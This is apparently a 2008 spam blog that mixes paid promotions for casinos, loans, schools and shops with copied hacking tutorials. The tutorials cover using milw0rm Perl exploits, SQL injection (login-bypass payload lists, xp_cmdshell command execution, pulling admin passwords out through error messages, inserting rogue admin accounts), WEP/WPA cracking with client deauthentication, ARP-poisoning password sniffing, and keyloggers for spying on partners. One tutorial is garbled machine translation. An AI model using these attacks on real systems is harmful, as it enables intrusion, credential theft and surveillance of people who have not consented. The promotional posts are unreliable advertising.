Before you start your business, you have to decide how much money you're going to need and you have to make sure that you have it available. You will need money to set up, start and run the business but you should also have the possibility to borrow some money should something unexpected happen or your business do extremely well. Borrowing money to invest in your business is a very common practice and should be seriously considered if you want to expand your business in a relatively short amount of time. If you need business loans now there is a funding company — which offers an easy process, fast funding and excellent service — EZUnsecured.Com. EZUnsecured.Com provides solution for your business financing. The experts behind this company will try their best to help business owner to survive and grow their business. Whenever you need an unsecured business loan, you can always go to EZUnsecured.Com.

Most Updated Online Casino Bonus Portal

Posted at Thursday, October 09, 2008

Many no deposit online casinos that offer welcome free casino bonus without any deposit required usually ask you for ID or very rarely to register a credit card before they give you your free casino chips no deposit. But there is no point to worry about that, it is for the same purposes as when you have to show your ID when you are registering a players card at brick and mortar casino. No deposit online casinos just want to make sure you are legal age and that you collect the free bonus just once. After you verify your personal details you can get certain free online casino bonuses instantly or you have to provide no deposit casino coupon codes. After you enter the no deposit casino bonus codes you will receive the free casino bonus without having to make a deposit. Many online casinos offer you free casino money just if you sign up at their casino and register an account. These free casino chips at no deposit online casinos are called no deposit casino bonuses.

If you are looking for new USA online casino bonuses and promotions, special bonus codes and casino coupons there is a recommend site All-Casino-Bonuses.com. All-Casino-Bonuses is the most updated online casino bonus portal. All-Casino-Bonuses have listed top online casinos represent what is the cream of the crop of online gambling industry. These online casinos offer excellent gambling experience together with large generous promotions that determined to be the best deal online. All of these online casinos have flawless reputation, and the wagering requirements are generally not to pressing if you take into account the size of the bonus. All-Casino-Bonuses assist Americans who are looking for casinos accepting US players. All-Casino-Bonuses receive the information directly from the casinos themselves and update the information as soon as possible. If an Online Casino stops accepting US players it is immediately removed from the list. All-Casino-Bonuses also continuing, as always, on their search to find additional US online casinos who qualify to be listed as a recommended online casino accepting US deposits. So don't hesitate if you are looking for online casino accepting US player to visit the site www.all-casino-bonuses.com.

Play Slots, Roulette, Poker and Blackjack Online

Posted at Tuesday, September 16, 2008

If you are want to play casino games online here at Dealem.com.au, it is a right place, they offering you an exciting, reliable and trustworthy service. Using advanced gaming software, Dealem.com.au able to bring you some of the best interactive gaming experiences available online. Playing at Dealem.com.au also allows you to take advantage of the fantastic offers they have available, which update constantly to ensure you are receiving the best promotions. Download for free and play some of your favorite online casino games like blackjack, roulette, and many more. You'll also enjoy playing Blackjack Casino, Online Poker and Online Slots. Specializing in Poker, Roulette, Slots and Blackjack, these lively casinos are the cyberspace version of a real live hotel and casino, and are a proud members of the highly esteemed Jackpot Factory Group. With high payouts, top rewards, and high betting limits, you can start playing the best online casino games in minutes.

Experience first-class online casino gambling with bonuses, promotions, and casino events. The fun and entertainment never ends here at Dealem.com.au. Challenge yourself to a wide variety of table games such Roulette, Blackjack Casino, Online Poker and Online Slots. They all offer a cheerful Welcome Bonus to all new players upon their first deposit. Plus, the casino's vast selection of over 265 amazing online casino games come side-by-side with frequent exciting promotions, where casino members stand to win even more bonuses and prizes. They offer you the winning combination of sporting fun and the thrilling chance to win. Offering their players a blast from the past but combining the perfect genuine Las Vegas gambling experience and the rocking 50s! Right from the onset, the casino management does everything possible to create a fun and unique feeling that simply cannot be beat. Should any of customers experience any problems, their support team are on hand 24/7 and you can call free or email from anywhere in the world. Join Dealem.com.au today and take advantage of special promotional offer.

Perl Tutorial Install and Runnning

Posted at Monday, September 15, 2008

Perl Tutorial Install and Runnning

Ok today I am going to show you how to use a perl exploit....

first go to

Code:
http://www.activestate.com/store/freedownload.aspx?
prdGuid=81fbce82-6bd5-49bc-a915-08d58c2648ca


And put in your info..... I might suggest not using your real name ><...

Select your download version (They do have a linux one)


Click, and download....Try to get the MSI file...Easier for installing...

on the msi just click next and what not...

Install and get ready for the next part....





Now to use an exploit, which we can get by going to milw0rm

Code:
milw0rm.com



now click on search....

if you can't find the link go to

Code:
milw0rm.com/search.php


and search perl....



now click on anyone of them....

I am going to be using

Code:
http://www.milw0rm.com/id.php?id=1489


Remember this is only for educational purposes....

I will post the code in another forum post

now open note pad and paste in the exploit....

and save it to you "perl/bin" folder...normally perl saves directly to your C Drive....


save it as

exploit.pl

and make sure to change where it "Text documents (*.txt)" to All files

MAKE SURE IT IS IN THE BIN FOLDER




now open command prompt...

and type

cd ..

then type

cd ..

now your Directory is in the c drive...

now type

cd perl\bin

and type

perl exploit.pl





and now you just follow the exploits directions and you now know how to use perl exploits...

SQL Injections Tutorial and Strings

Posted at Monday, September 15, 2008

SQL Injections Tutorial and Strings

Details
1.0 Introduction
When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.

What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

What do you need?
Any web browser. Firfox runs very smoothly

What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "F0RM" tag in the HTML code. You may find something like this in some HTML codes:

code:
<F0RM action=Search/search.asp method=post>

<input type=hidden name=A value=C>
</F0RM>
[/quote]Everything between the <F0RM> and </F0RM> tags have potential parameters that might be useful (exploit wise).

What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:

****://duck/index.asp?id=10

How do you test if it is vulnerable?
Start with a single quote trick. Input something like:

hi' or 1=1--

Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- ****://duck/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:

code:
<F0RM action=http://duck/Search/search.asp method=post>

<input type=hidden name=A value="hi' or 1=1--">
</F0RM>
[/quote]If luck is on your side, you will get login without any login name or password.

But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:

****://duck/index.asp?category=food

In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

SELECT * FROM product WHERE PCategory='food'

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.

Now, assume that we change the URL into something like this:

****://duck/index.asp?category=food' or 1=1--

Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using double quote (") if single quote (') is not working.

The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

#tcpdump icmp

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must folder "share" sharing for Everyone.

6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:

****://duck/index.asp?id=10

We will try to UNION the integer '10' with another string from the database:

****://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

To get the next table name, we can use the following query:

****://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We also can search for data using LIKE keyword:

****://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:

****://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

Now that we have the first column name, we can use NOT IN () to get the next column name:

****://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:

****://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.

Now, let's get the first login_name from the "admin_login" table:

****://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

****://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

We can now login as "neo" with his password "m4trix".

How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":

****://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.

To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:

****://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5

Now, you can even login as 'trinity' with the password '31173'.

How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":

****://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

To INSERT a new record into the database:

****://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

We can now login as "neo2" with the password of "newpas5".

How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie

For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

Delete stored procedures that you are not using like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask



Here are a list of strings that you can use on a simple web page.Put them in the password bar and admin in the user name bar and then press enter, if the first one doesn't work try the next one, if non of them work, then it won't work...
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

Medical Assistant School Online

Posted at Wednesday, September 10, 2008

Medical Assistant perform administrative and clinical tasks to keep the offices of physicians, podiatrists, chiropractors, and other health practitioners running smoothly. They should not be confused with physician assistants, who examine, diagnose, and treat patients under the direct supervision of a physician. Medical Assistant is different than physicians' assistants. The duties of Medical Assistants vary from office to office, depending on the location and size of the practice and the practitioneris specialty. In small practices, Medical Assistant usually is generalists, handling both administrative and clinical duties and reporting directly to an office manager, physician, or other health practitioner. Those in large practices tend to specialize in a particular area, under the supervision of department administrators.

If you are interesting about your career in Medical Assistant get started with Medical Assistant School Online at St. Augustine School of Medical Assistants. According to the United States Department of Labor, Medical Assistant employment is projected to grow much faster than average, ranking medical assisting among the fastest growing occupations over the next decade. Job opportunities should be excellent, particularly for those with formal Medical Assistant training. St. Augustine School of Medical Assistants now offering formal training online with nationally accredited and certified Medical Assistant program. Their program will allow you to study online at your own pace and convenience. Most students complete the program in about 6-8 weeks. However, you can take as long as needed. There are no deadlines or time limits and their Medical Assistant training program is very affordable. So, what are you waiting for? Register online today and become a Medical Assistant that very rewarding career.

Study Online to become a Nursing Assistant!

Posted at Friday, August 29, 2008

If you are looking for a career in health care especially become a nursing assistant, you will find information at nursingassistant.us to help guide you in your career choice. For those of you who are not familiar with nursing assistants, they are known by many names such nurses aid, orderlies, patient care technicians, and home health aides, depending on where you live and work. Certified nursing assistants work under the supervision of a nurse and provide assistance to patients with daily living tasks. Working closely with patients, certified nursing assistants are responsible for basic care services such as bathing, grooming and feeding patients, assisting nurses with medical equipment, and checking patient vital signs. Certified nursing assistants give patients important social and emotional support and also provide vital information on patient conditions to nurses.

If you are interested in learning more about becoming a certified nursing assistant, please be sure to check out St. Augustine Educational Services Online through site nursingassistant.us that utilize the latest technology to offer a convenient, affordable and accredited nursing assistant program online. St. Augustine Nursing Assistant School provide certificate program on nursing assistance and medical assistance as well. Some benefits of nursing assistant program at St. Augustine Nursing Assistant School such online e-learning program allows students to study at their own pace and finish the program at their convenience. All classes are available 24 hours a day for students. Faculty and staff are always available online should you have any questions. Online Clinical Labs - Virtual Phlebotomy Lab, Virtual Injection Lab, online clinical instructional videos in medication injections, ultrasound and more!

Buy Online Kids Halloween Costume

Posted at Wednesday, August 27, 2008

Did you know that there are many group kids Halloween costumes ideas? Many times, friends, relatives, and individuals that work together elect to dress in attire that is similar in theme on Halloween. In all actuality, that is the most important aspect to creating costumes that are appropriate for an entire group...having a similar theme. If your kids theme matches, then your kids group will be successful in their Halloween attire. Having group costumes can be a lot of fun. The most challenging aspect of the whole endeavor in Halloween costume ideas is choosing costumes that are similar in nature. It is often difficult to think of an idea that everyone will enjoy. However, once you have all agreed on an idea, this is a really fun activity that everyone will thoroughly enjoy.

If your kids grew up in the nineties, there are a number of group Halloween costume ideas that your kids may enjoy. First, your kids have the ever-popular Care Bears. There are many different bears to choose from. Surely each individual in your kids group can find one that truly matches their personality! This can be a lot of fun! Your kids may enjoy dressing like the Power Rangers, popular Disney movies from the decade, and more! If your kids are a Millennium type group, your kids may like dressing up like characters from Spongebob Squarepants, and even Hannah Montana. There are other popular group Halloween costume ideas as well. You may elect to have a Harry Potter theme. This is actually really popular. It is really easy to think about group ideas when it comes to costumes for Halloween. All it takes is a little bit of creativity and finding out what everyone else in the group likes, and you are sure to discover a group theme that everyone will agree on. If you are searching out group Halloween costume ideas, take these into consideration. Not only will your group be a big hit, but you are sure to have a lot of fun with them.

Rightnow, if you need Halloween costume for your kids group there is www.costumecauldron.com supplying you with all the information and resources you need to know about Halloween night. Struggling for kids Halloween costume ideas? Look no further. Take a look through Costume Cauldron vast collection of funny kids Halloween costumes as well as kids male and kids female Halloween costumes. The child halloween costume section is the biggest in Costume Cauldron online store and there is much to look through. Costume Cauldron have cute kids costumes for girls and boys that will make them the hit of the party. You’re never too young to celebrate your first Halloween. Pick out one of these adorable baby Halloween costumes to show your new baby’s the sights and sounds of his or her first Halloween. Just be sure to get your little goblin back in time for bed. There is also furry mascot costumes for your school sport games or a full size animals for the party. Don't miss out on Costume Cauldron blonde wig costumes for adult people. So, lets your kids get started their Halloween party!

SQL Injection the Complete Tutorial

Posted at Wednesday, August 13, 2008

SQL Injection the Complete Tutorial

SQL injection is a technique that explores a vulnerability of security that occur in the database of a layer of application. The vulnerability i present when user input i either incorrectly filtered will go string literal escape characters embedded in SQL statements or user input i not strongly typed and thereby unexpectedly executed. The vulnerability is present when user is or incorrectly screened for literal cord escape built-in characters in the instructions SQL or users strongly are not typed and, like this, unexpectedly performed. It i in fact an instance of it lives general class of vulnerabilities that can occur whenever one programming or scripting language i embedded inside another. It is in fact an example of a form more general class of vulnerabilities that can occur whenever a programming language or scripting is inserted inside another.
__________________________________________________

Or Be an a lot Way NooB of invade a big quantity of sites. ...........

For that vc is going to be necessary. .....

*Google *internet Connected *Strings *codicos of Sql injection *JAP (is not necessario is good use barely as
security)

Then vamu her. ...............como I am baunzinho I see passes them half from the trabaio. ...
__________________


' to admin shell root First
vc goes in the google and digitizes the following one (allinurl: "Some Of The Strings") Without "Parenteses"

ah vc chooses a site noob applies in the login by example:' or' = 1 sign to same thing:' or' = 1

Promptly now vcs can vary the codicos and itself will want polpar work use some scanner of vulnerability as by example the acunetrix __________________________________________________

JAP 00.08.073

JAP — Anonymity & Privacy is a program that is going to guarantee to his privacy while sails for the internet. With that, you avoid that can monitor your accesses and guarantees the your anonymity by the net.

Code:

http://baixaki.ig.com.br/download/JAP.htm

__________________________________________________

Acunetix Web Vulnerability Scanner 5,0

Omprove itself his site is to the Test of hackers Acunetix Web Vulnerability Scanner is a powerful utility one that analyzes a site in search of possible vulnerabilities.
Code:

http://www.download3000.com/download_11974.html

Athletic Shoes for Men, Women, and Kids

Posted at Wednesday, August 13, 2008

If you are looking for athletic shoes from many popular brand name, there is recommend name for you Shoebacca.com. At Shoebacca.com auction yesterdays and today's hottest footwear, offering savvy internet shoppers an opportunity to stretch their dollar further than ever. Shoebacca.com auctions brand name stock from floor models to disheveled items that are slightly dusty from warehouse storage. Shoebacca.com lists all brands, colors and sizes currently available. All shoes are standard manufacturer's sizes, widths and lengths unless otherwise noted in the auction. Shoebacca.com sells a variety of popular brand name athletic shoes for men, women, and kids. Shoebacca.com's website create a simple way for customers to select and purchase from various footwear brands. They offers customers the ability to easily view ever-expanding footwear offering.

Shoebacca.com where you always find the best athletic shoes at the lowest prices anywhere. Shoebacca.com carries your favorite brands in athletic footwear at the best prices. They provides most of popular brands such as Adidas, Converse, Fila, Hurley, K-Swiss, New Balance, Nike, PF Flyers, Pony, Puma, Vans, and more. At Shoebacca.com website you can selected the category (brand, style, size, color), then select your desired brand, click view selected brand you will see many available shoes. You may looking for some great prices on basketball, tennis, or any other type of athletic shoes, you might want to check out Adidas Shoes. This popular brand shoe which has a huge range of styles. With a few simple clicks, consumers can find shoes by brand including adidas, by style such as basketball shoes, and by specific sizes, widths and colors. Shoebacca.com offers discount shoes from many popular brand name athletic shoes. If you like to collect many cheap shoes you might to hunt for it from Shoebacca.com. ShoeBacca.com will serve you better than other shoe store. Start browsing for your shoes and find them at Shoebacca.com.

Advertisers Get Buzz with Snapbomb

Posted at Wednesday, August 13, 2008

The trend of blog advertising has significantly grown over the last year as a new medium for companies to increase their media presence. However, the idea of bloggers being paid by companies to promote their product is relatively new. Part of the allure of blogs are their direct community input and feedback. Advertisers have just started to figure out how to inject their buzz without alienating the very target market they want to attract to their products. We think that buzz marketing or blog marketing done fairly is a valuable service to both consumer online and their customers. Buzz marketing, is highly valued by advertisers. Blog advertising can engage an important niche, enabling you to reach a critical market segment or to broaden the impact of your marketing spend. Regardless of your product, blogs can be an integral part of a marketing strategy.

Snapbomb offers advertisers generate buzz with blog marketing. Snapbomb is the fastest way to spread the word through the blogging community. They connects advertisers with bloggers willing to write honest reviews about their services and products. Benefits for advertisers include generate buzz, publicity and word-of-mouth marketing among thousands of blogs, announce your products, services, websites, and ideas to the world. The more bloggers talk about your site the better. Many blogs syndicate stories they see on other sites. Getting Reviewed by bloggers will provide advertisers with valuable feedback that advertisers can use to better understand advertisers's audience and customers.

WEP cracking in a nutshell (NEWCOMERS PLEASE READ)

Posted at Saturday, August 09, 2008

WEP cracking in a nutshell (NEWCOMERS PLEASE READ)

It found that some of the commands differ from backtrack 2 to backtrack3 (slightly)
either way heres a step by step
once you have the backtrack iso cd in the tray and your network adapter plugged into the usb (it use a network adapter)
boot up your computer.
next to the k that resembles start menu in windows there should be a little black window click on it and it pulls up whats called terminal (simmilar to dos for windows)
now itll go into what to type in the terminals, it usually have about 4 of these windows open and it will identify which window you type in by writing "t1,t2, t3, etc" before each instruction
where it type <> you insert information where it type [enter] you hit enter
youll get it as we go along

also when you see your victims bssid you will want to copy it and then paste it where needed being that a bssid is pretty long. for those who hate using the mouse and use hotkeys the paste function is shift+insert for linux

t1:
type: airmon-ng stop ath0 (this will let you see the devices your using ex: rausb0) [enter]
ifconfig [enter] <-- it dont remember if this enter goes here you can try it with or without, see which works
macchanger --mac 00:11:22:33:44:55 (this changes your mac address in order to cause some confusion) [enter]
airmon-ng start [enter]

t2: airodump-ng (scans the network for available wireless networks, press ctrl+c to pause) [enter]
airodump-ng -c -w --bssid [enter]
(let this window run throughout the entire crack)
basically what you just did in t2 was scan the available networks and then say to your computer ok well were gonna make a catch file in this location (this is where i said name a catch file) and were gonna read packets of information in this location (what your doing to crack the wep encryption is send information (packets) to whatever network you want to crack and that network is sending information back, the files we want are not neccessarily the packets but the arp's, thats what aircrack actually analyzes in order to crack the wep)

t3:
aireplay-ng -1 0 -a -h 00:11:22:33:44:55 [enter]
aireplay-ng -3 -b -h 00:11:22:33:44:55 [enter]

t4:
aircrack-ng -n 64 --bssid -01.cap

for the catch file part...lets say it named my catch file "hack" it would type in hack-01.cap


and thats it you should have your wep passphrase

also a little something it noticed, though not true for all networks its true for many networks around my way....
it noticed the bssid is often the same as the passphrase, so just MAYBE you would want to try the bssid before doing the rest of the hack

WEP Crack Basics:
bt ~ # iwconfig (check wireless card name - we will assume ath0)
bt ~ # airmon-ng stop ath0
bt ~ # airmon-ng start ath0
bt ~ # airodump-ng -w capture -c 1 ath0 (writes to file "capture" on channel 1, as specified)
New terminal (leave other one open)
bt ~ # macchanger ath0 (not down MAC address)
bt ~ # aireplay-ng -1 0 -e NETWORK -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0 (where the AA:BB:etc. is the access point's MAC address, also seen as the BSSID in the first terminal [airodump] window, and the second GG:HH:etc. is your own MAC address as seen in the macchanger window)

Section for when clients are attached to the network:
bt ~ # aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0

Section for when no clients attached:
Method 1-
bt ~ # aireplay-ng -5 -b AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0
Answer y for yes when prompted. Note down to two names of files - the fragment-xxx-xxxxxx.xor file, and the replay_src-xxx-xxxxxx.cap file)
bt ~ # packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w replay_src-xxxx-xxxxxx.cap
bt ~ # aireplay-ng -2 -r replay_src-xxxx-xxxxxx.cap ath0

Method 2-
bt ~ # aireplay-ng -4 -h GG:HH:II:JJ:KK:LL -b AA:BB:CC:DD:EE:FF ath0
Answer y for yes when prompted. Note down to two names of files - the fragment-xxx-xxxxxx.xor file, and the replay_src-xxx-xxxxxx.cap file)
bt ~ # packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w replay_src-xxxx-xxxxxx.cap
bt ~ # aireplay-ng -2 -r replay_src-xxxx-xxxxxx.cap ath0


Cracking the key:
bt ~ # aircrack-ng (-z) capture*.cap (the -z is in brackets because it can be used if you have captured ARP requests, and is faster - so try this first, but if it doens't work - remove it) (the capture*.cap is just using the file that you captured to - this can be run whilst capturing)




WPA Cracking:
bt ~ # airmon-ng stop ath0
bt ~ # airmon-ng start ath0
bt ~ # airodump-ng -w wpa -c 1 ath0
New Terminal:
bt ~ # aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c MM:NN:OO:PP:QQ:RR ath0 (where the MM:NN:etc. is a client's MAC address - this forces them to disconnect, giving us the "handshake" that we want, which contains the password, otherwise you just have to wait for a client to connect)
bt ~ # aircrack-ng -w dictionary.lst wpa*.cap (dictionary.lst is a dictionary/wordfile, as WPA has to be cracked with one of these. wpa*.cap is the capture file)

Sniffing for passwords

Posted at Saturday, August 09, 2008

Sniffing for passwords

Download and install Cain and Abel (oxid.it). If you have nmap or wireshark installed you probably won’t have to install winpcap(which comes with the installation.)

http://www.oxid.it/cain.html
http://www.oxid.it/downloads/cain20.exe

Run the program.
Make sure the sniffer tab is selected at the top and the hosts tab is selected at the bottom. Make sure the sniffer is on it is the green circuit board button in the top left corner. Alternate click in the white space and click on scan mac addresses. This does an arp scan(different from an IP scan). It will show everyone on your network except for you.
http://www.flickr.com/photos/23172723@N08/2214744335/

Now switch to the arp poisoning tab. APR bottom tab next to hosts. Click the + icon on the top of the menu. This will give you a choice of Ip addresses to poison. The most interesting traffic is going to be between the default gateway(which you can find by typing ipconfig in the command prompt) and the other users on the network. Select the default gateway on the left and all the other users on the right. **Optional fun Now if computers are sharing files, to snag their passwords you need to select all the ip’s to all the ip’s you have to do this one ip at the time on the left. **
http://www.flickr.com/photos/23172723@N0...otostream/
If it is a large network you are going to want to monitor your resources on your computer to make sure you aren’t hitting 100% processor consumption or maxing out your ram. If this happens it will DDOS the network and people will start losing connections which is no good for password sniffing.
So now is the hard part….wait. Wait for people to log on to forums and myspace and all those great sites and wait for them to get in their vpns and telnets and such. One thing you can do while you wait is periodically check your internet connection to make sure you haven’t DDOSed the network. Ok so now time for the boon, click on the password tab at the bottom and see how many passwords you have racked up. If they are encrypted alt click on them and send them to the cracker built in to cain and abel.

**WOW THIS IS COOL TELL MORE ABOUT THE TCP/IP MAGIC**
On networks with a hub you don’t have to arp poison, but most modern networks are switched. So what is actually happening when you do this, is your computer answers every arp query as though it is the computer the packet is destined for. So your computer has all data from the network sent to it. I then routes(it doesn’t really route because that would be a layer three thing it would be more correct to say, it sends) the packets to the correct computer. So Cain has a bunch of prebuilt lists of stuff to look for, sometimes cain doesn’t catch all the passwords because of trixy web developers so if you have time you could run wireshark at the same time and manually comb through that data yourself. Etherflood is another program that will arp poison on a windows network.

a little bit about keyloggers

Posted at Saturday, August 09, 2008

a little bit about keyloggers

the boring background
What keyloggers do is they take note of every keystroke that the person who downloaded the keylogger types. why is this useful? you can do a couple things with a keylogger. you can use it on yourself to find out everything that people type while your not around or you can install it on someone elses machine to see everything that they type.....

Uses
find out whats being typed on your computer while your not around
find out whats being typed on someone elses computer (example girlfriend or boyfriend)
passwords and log-ins

Why is this better than phishing?
